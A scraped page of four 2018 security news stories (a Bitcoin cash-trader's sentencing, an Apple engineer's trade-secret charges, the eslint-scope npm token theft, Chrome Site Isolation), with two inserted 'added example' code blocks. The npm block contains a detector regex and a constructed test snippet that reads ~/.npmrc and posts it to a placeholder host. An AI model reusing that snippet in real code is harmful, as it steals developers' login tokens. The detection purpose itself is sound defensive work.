Prosecutors pointed out that Tetley most certainly did operate as a business, given that she maintained ledgers, owned a money-counting machine “to ensure that she was always accurate”, and had paid out between $6,000,000 and $9,500,000 in cash over three years.

Six million, it seems, is a bit much for a hobby.

Secondly, if you do any individual trades involving more than $10,000 in cash, you have to declare them.

It would have been tricky for Tetley to have complied with this part of the law without incriminating herself on the first point – and prosecutors knew she had done at least three transactions over $10,000 because they’d had undercover federal agents do those deals.

According to the Sentencing Position document, a federal undercover agent identified only as UCA-2 had traded with Tetley on three occasions:

  • “UCA-2 and defendant conducted a Bitcoin-for-cash transaction [in July 2016] (approximately $45,000), at a restaurant; defendant provided UCA-2 with cash (in exchange for his Bitcoin) in seven white envelopes.”
  • “Defendant provided approximately $70,000 in seven white envelopes to UCA-2 [in January 2017]. Defendant continued to assure UCA-2 that she was trustworthy and reputable, and UCA-2 emphasized that he was in the business of selling narcotics.”

What about the bags?

No bags, brown or otherwise, just white envelopes!

But we didn’t have to wait long in the story:

  • “Defendant and UCA-2 arranged to meet in March 2017 for a $300,000 exchange transaction. Defendant brought to the transaction two Trader Joe’s paper grocery bags. Defendant was arrested at this transaction.”

Bitcoin Maven also dealt in cash with an alleged darkweb drug dealer she knew as “Pirate Shit”, aka “David”, apparently to the tune of $6,000,000.

The prosecutors didn’t say what sort of cash discount the Bitcoin Maven demanded for her off-the-record purchases – they just noted wryly that she acted “with an intent to profit; she charged above-market rates, which presumably was profitable for her.”

For that reason, prosecutors argued that Tetley’s crimes deserved a “significant sentence” of 30 months (2.5 years) in prison, both as a deterrent and in recognition of the severity of the crimes:

Providing cash in envelopes (and in the significant amounts she did), in coffee shops and restaurants, is no way to conduct legitimate business, certainly when that volume exceeds the millions, and someone such as defendant – a former stockbroker and real estate investor – was certainly aware of that. Her decision to continue to proceed in this manner highlights the seriousness of the offense that warrants a custodial sentence of 30 months.

We dare say that neither the coffee shops, nor the restaurants, nor yet the envelopes, are key factors here.

If you were to put $6,000,000 in a hand-woven picnic hamper instead of stuffing it into bags or envelopes, and hand it over at the opera, instead of in a coffee shop or a restaurant, you’d still be in serious trouble.

What next?

In the end, Tetley was sent to prison for one year (technically, 366 days), given three years’ supervision after release, and fined $20,000.

She was also instructed to hand over BTC40 (currently worth about $250,000 at legitimate rates), just under $300,000 in cash and “25 assorted gold bars” that the court deemed to be the proceeds of crime.

And those paper bags?

The US Attorneys aren’t saying what colour they were, but given they were grocery bags from Trader Joe’s, we’re saying that they were, indeed, proverbially brown.


Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/w1tFFlQ6ejM/

FBI for the Apple guy: Bloke accused of stealing robo-car tech

A former Apple engineer has been hit with federal trade secrets theft charges after trying to lift Cupertino’s autonomous car tech on behalf of Alibaba.

The California Northern District Court will hear the case (PDF) of Xiaolang Zhang, an engineer who in 2015 was hired to work on the Cupertino music seller’s ultra-secretive self-driving car project. He was designing and testing circuit boards before leaving in April of this year to join an Alibaba and Foxconn-backed Chinese startup called Xiaopeng Motors.

According to prosecutors, Zhang took two circuit boards and a server as well as copies of files and information from two databases containing the details of Apple’s worst kept secret since the iPhone with the intent of moving it with him to China.

The theft was said to have taken place between April 28 and April 30, the day Zhang announced his resignation from Apple. Prosecutors believe that during that stretch, Zhang lifted both the hardware and data from Cupertino headquarters with the aim of taking the information to his new employer.

Apparently, Zhang was less than discreet in his efforts, making it fairly easy for Apple security to catch him.

“Apple’s database security team found that in the days just prior to April 30, 2018, Zhang’s Apple network activity increased exponentially compared to the prior two years of his employment,” the criminal complaint reads.

“The majority of his activity consisted of both bulk searches and targeted downloading copious pages of information from the confidential database applications.”

According to the South China Morning Post, Zhang was lifted by cops earlier this week when he attempted to fly out of San Jose Airport. Xiaopeng Motors is said to be looking to wash its hands of the matter, denying all knowledge of Zhang’s plans. ®

Sponsored:
Minds Mastering Machines – Call for papers now open

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2018/07/12/fbi_apple_stealing/

Now Pushing Malware: NPM package dev logins slurped by hacked tool popular with coders

An unfortunate chain reaction was averted today after miscreants tampered with a widely used JavaScript programming tool to steal other developers’ NPM login tokens.

The open-source utility eslint-scope was altered by hackers so that, when used to analyze source code, it would copy the contents of the user’s ~/.npmrc file to an outside server via HTTPS – that file would include the victim’s NPMjs.org login token.

NPM is the JavaScript world’s package manager for libraries, toolkits, and other code projects. With those tokens in hand, scumbags could have started altering other packages to further collect login tokens, insert malicious code into programs, and so on, possibly initiating a chain reaction of cyber-crime.

Although eslint-scope has more than two million weekly downloads, we’re told only a small number of people were stung by the compromised version, and had their tokens swiped. Tokens issued before 1230 UTC today have been revoked, people should change their NPM passwords and enable two-factor authentication, and an investigation is underway to discover if any NPM packages have been vandalized via stolen credentials.

Hijacked

Version 3.7.2 of eslint-scope was pushed to NPM by miscreants who gained control of a maintainer’s account for the software: that’s the poisoned version that harvested people’s NPM login tokens. It has since been taken offline.

The credential thieves could have used the tokens to gain access to other NPM-managed projects that could, again, be used to spread more malware. NPM users download billions of packages every week.

In other words, someone lost control of their account to an attacker, who then implanted malicious code in a popular tool to gain access to NPM accounts and potentially infect further packages.


Understandably, NPM has already invalidated tokens issued before 2018-07-12 1230 UTC in an attempt to prevent the further spread of evil code. Unfortunately, the damage may have already been done. NPM said “a small number” of developers, and potentially their projects, were affected by this.

“We believe the vector for this compromise was stolen credentials from one of the authorized publishers of the eslint-scope package,” NPM said in a statement on its website.

“We recommend all package authors enable two-factor auth to protect their accounts from this kind of attack.”

The hijack is believed to have kicked off some time last night, with an eslint-scope maintainer’s account receiving a new unexpected NPM token overnight, tipping off coders to a possible security breach.

“One of our maintainers did observe that a new npm token was generated overnight (said maintainer was asleep),” explained eslint dev Kevin Partington.

Anyone who used the infected version of eslint-scope has, by now, had their NPM tokens revoked, so that part of the attack has been mitigated. They should also delete the software, and install a known good version.
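Two checks a developer could run after reading the above, as an added example that is not code from the article, from ESLint or from NPM: a walk over a package-lock.json tree that reports every install of a package pinned at a version reported as compromised (eslint-scope 3.7.2, the version named in the article, is the only entry in the table), and a static heuristic that flags package source which both reads ~/.npmrc and opens an outbound HTTPS connection, the behaviour the article describes. The sample lockfile and source snippets are constructed for the example.

```javascript
// Added example, not code from the article, ESLint or npm. Two defender-side checks
// for an incident like the eslint-scope one:
//   1. walk a package-lock.json tree and report every install of a package pinned
//      at a version reported as compromised (eslint-scope 3.7.2, per the article);
//   2. a static heuristic that flags package source text which both reads ~/.npmrc
//      and opens an outbound HTTPS connection.
// The sample lockfile and source snippets below are constructed for the example.

const COMPROMISED_VERSIONS = { 'eslint-scope': new Set(['3.7.2']) };

// Recursively walk a lockfileVersion-1 "dependencies" tree (nested objects keyed by
// package name, each with a "version" and optional nested "dependencies").
// Returns one "parent@ver > child@ver" trail per compromised install found.
function findCompromised(lockNode, compromised = COMPROMISED_VERSIONS, trail = [], hits = []) {
  const deps = lockNode.dependencies || {};
  for (const [name, info] of Object.entries(deps)) {
    const here = trail.concat(`${name}@${info.version}`);
    const bad = compromised[name];
    if (bad && bad.has(info.version)) hits.push(here.join(' > '));
    findCompromised(info, compromised, here, hits); // transitive dependencies
  }
  return hits;
}

// Heuristic indicators for credential exfiltration from a package's JS source.
// Both must be present to raise a flag; each alone is common in benign code
// (config readers touch .npmrc, HTTP clients use the https module).
const READS_NPMRC = /\.npmrc\b/;
const OUTBOUND_HTTPS = /require\(\s*['"]https['"]\s*\)|https\.(request|get)\(/;

function looksLikeNpmrcExfil(source) {
  return READS_NPMRC.test(source) && OUTBOUND_HTTPS.test(source);
}

// Constructed sample lockfile: the compromised version is pulled in transitively
// through two parents, while the top-level eslint-scope is a clean 3.7.1.
const SAMPLE_LOCK = {
  name: 'example-app',
  lockfileVersion: 1,
  dependencies: {
    eslint: {
      version: '5.1.0',
      dependencies: { 'eslint-scope': { version: '3.7.2' } },
    },
    'eslint-scope': { version: '3.7.1' },
    'babel-eslint': {
      version: '8.2.5',
      dependencies: { 'eslint-scope': { version: '3.7.2' } },
    },
  },
};

// Constructed source snippets: one benign (reads .npmrc for configuration only),
// one that matches the read-then-upload pattern.
const BENIGN_SRC = `
const fs = require('fs');
const rc = fs.readFileSync(require('os').homedir() + '/.npmrc', 'utf8');
module.exports = parseRc(rc);
`;
const SUSPICIOUS_SRC = `
const https = require('https');
const rc = require('fs').readFileSync(process.env.HOME + '/.npmrc', 'utf8');
https.request({ method: 'POST', host: 'example.invalid', path: '/c' }).end(rc);
`;

// Collect the results of both checks over the constructed inputs.
function report() {
  return {
    compromisedPaths: findCompromised(SAMPLE_LOCK),
    benignFlagged: looksLikeNpmrcExfil(BENIGN_SRC),
    suspiciousFlagged: looksLikeNpmrcExfil(SUSPICIOUS_SRC),
  };
}

if (typeof require !== 'undefined' && require.main === module) {
  console.log(JSON.stringify(report(), null, 2));
}
```

The lockfile walk is the part worth keeping: a top-level `npm ls eslint-scope` shows the same trails, but reading the lockfile directly also works in CI on a checkout with no node_modules installed. The source heuristic is deliberately a two-signal rule; it is a triage aid for the packages the lockfile check surfaces, not a substitute for revoking tokens and reinstalling a known-good version.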

NPM said it will conduct a further audit of all of its managed projects to determine just how bad the breach really was. ®


Article source: http://go.theregister.com/feed/www.theregister.co.uk/2018/07/12/npm_eslint/

Google claims Site Isolation will stop Spectre haunting Chrome users

Google is touting the benefits of a recently introduced browser security feature called Site Isolation.

Site Isolation has been gradually introduced to users of the Chrome browser over several months, but now Google has officially unveiled this important piece of tech.

When Site Isolation is enabled, Chrome runs a different browser process for each internet domain. Google initially described Site Isolation as an “additional security boundary between websites,” preventing malicious sites from messing with the code of legitimate domains.

Rather than being pitched as an enhancement to defend against cross-site scripting attacks, the technology is now being positioned as a necessary defence against the infamous Spectre vulnerability, as a blog post from Google explains.

Speculative execution side-channel attacks like Spectre are a newly discovered security risk for web browsers. A website could use such attacks to steal data or login information from other websites that are open in the browser. To better mitigate these attacks, we’re excited to announce that Chrome 67 has enabled a security feature called Site Isolation on Windows, Mac, Linux, and Chrome OS.

Site Isolation has been optionally available as an experimental enterprise policy since Chrome 63, but many known issues have been resolved since then, making it practical to enable by default for all desktop Chrome users.

Site Isolation was available as an optional (under the hood) feature after it was introduced with Chrome 63 in December 2017. It was enabled by default on desktops with the release of Chrome 67, at the end of May, as previously reported.

In its blog post, Google goes on to explain how the tech works, adding that it had been working on Site Isolation even before Spectre appeared in January.

When Site Isolation is enabled, each renderer process contains documents from at most one site. This means all navigations to cross-site documents cause a tab to switch processes. It also means all cross-site iframes are put into a different process than their parent frame, using “out-of-process iframes.”

Splitting a single page across multiple processes is a major change to how Chrome works, and the Chrome Security team has been pursuing this for several years, independently of Spectre.

Site Isolation changes Chrome’s behaviour under the hood, but this “generally shouldn’t cause visible changes for most users or web developers,” according to Google. Although the vast majority (99 per cent) of Chrome users are being moved onto Site Isolation, Google is keeping one in 100 on a temporary holdback to “monitor and improve performance”.

[Diagram: Site Isolation in Chrome] With Site Isolation, a single page may now be split across multiple renderer processes using out-of-process iFrames.
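To make the process split concrete, here is an added model (not Chrome’s code) of the “site” grouping that Site Isolation uses to decide which documents may share a renderer process. Chrome’s site key is the scheme plus the registrable domain (eTLD+1), looked up against the full Public Suffix List; this model substitutes a tiny constructed suffix table, which is the assumption to keep in mind, and the sample page with its iframes is constructed for the example.

```javascript
// Added example, not Chrome's code: a model of the "site" key that Site Isolation
// groups documents by. Chrome uses scheme + registrable domain (eTLD+1) against the
// full Public Suffix List; this model uses a small constructed suffix table instead.

const PUBLIC_SUFFIXES = new Set(['com', 'org', 'net', 'co.uk', 'github.io']);

// Return the registrable domain (eTLD+1) of a hostname under the constructed table.
// Tries the longest candidate suffix first so "co.uk" wins over "uk".
function registrableDomain(hostname) {
  const labels = hostname.toLowerCase().split('.');
  for (let i = 1; i < labels.length; i++) {
    const suffix = labels.slice(i).join('.');
    if (PUBLIC_SUFFIXES.has(suffix)) return labels.slice(i - 1).join('.');
  }
  return hostname.toLowerCase(); // no known suffix: whole host is the domain
}

// Site key = scheme + registrable domain. Scheme is part of the key, so an http
// and an https document on the same domain are different sites.
function siteKey(url) {
  const u = new URL(url);
  return `${u.protocol}//${registrableDomain(u.hostname)}`;
}

// Assign each frame of a page to a renderer process: frames with the same site
// key share one process; a cross-site iframe is placed in a different process
// from its parent (an "out-of-process iframe"). Process ids are allocated in
// order of first appearance.
function assignProcesses(frameUrls) {
  const processBySite = new Map();
  return frameUrls.map((url) => {
    const site = siteKey(url);
    if (!processBySite.has(site)) processBySite.set(site, processBySite.size + 1);
    return { url, site, process: processBySite.get(site) };
  });
}

// Constructed page: a top document plus three iframes.
const SAMPLE_FRAMES = [
  'https://news.example.com/story',
  'https://ads.example.com/banner',     // same site as the top frame: same process
  'https://widgets.vendor.co.uk/embed', // cross-site: its own process
  'http://news.example.com/insecure',   // same domain, different scheme: separate site
];

// Number of renderer processes the constructed page needs under the model.
function processCount(frameUrls = SAMPLE_FRAMES) {
  return new Set(assignProcesses(frameUrls).map((f) => f.process)).size;
}

if (typeof require !== 'undefined' && require.main === module) {
  console.table(assignProcesses(SAMPLE_FRAMES));
}
```

The point the model makes is the one in Google’s description: isolation is per site, not per origin, so two subdomains of one registrable domain still share a process, while the vendor widget and the plain-http frame do not.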

Spectre patches have been known to impair performance in other contexts, but it doesn’t seem that the Chocolate Factory anticipates issues. The long soft launch of the technology provided plenty of time to iron out any wrinkles, after all.

Google is investigating how to extend Site Isolation coverage to Chrome for Android, where there are additional known issues. Ahead of prime time, experimental enterprise policies for enabling Site Isolation will be available in Chrome 68 for Android. ®


Article source: http://go.theregister.com/feed/www.theregister.co.uk/2018/07/12/chrome_site_isolation/